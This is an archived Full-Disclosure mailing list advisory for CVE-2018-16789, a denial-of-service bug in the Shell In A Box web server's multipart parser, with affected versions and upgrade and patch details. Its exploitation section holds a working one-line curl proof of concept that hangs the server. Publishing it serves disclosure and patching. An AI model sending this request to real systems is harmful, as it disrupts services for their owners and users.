[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] CVE-2018-16789: denial of service in shellinabox
From:       Imre Rad <radimre83 () gmail ! com>
Date:       2018-10-26 12:07:31
Message-ID: CAPWzz4z0nz8ccm_pL27fBAaYrujsGTW6UUDSKMGcO76QACGKZw () mail ! gmail ! com
[Download RAW message or body]

Product: Shell In A Box (aka shellinabox, shellinaboxd)

"Shell In A Box implements a web server that can export arbitrary command
line tools to a web based terminal emulator. This emulator is accessible to
any JavaScript and CSS enabled web browser and does not require any
additional browser plugins. "
Most official-ish site: https://github.com/shellinabox/shellinabox

Vulnerability description:

The multipart/form-data parser function in the built-in webserver of Shell
In A Box enters an infinite loop in case of malformed request payload, the
server stops serving new requests and the the process eats up 100% of CPU
time.

Exploitation:

curl -v --header "Content-type: multipart/form-data;
boundary=------------------------8d14c0216fd84557" -d "impeachment"
http://127.0.0.1:4200/s/


Affected Shell In A Box versions:
2.20 and below

Remediation:
Upgrade to 2.21
Package available in Debian sid:
https://packages.debian.org/source/sid/shellinabox
Patch: https://github.com/shellinabox/shellinabox/pull/446

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]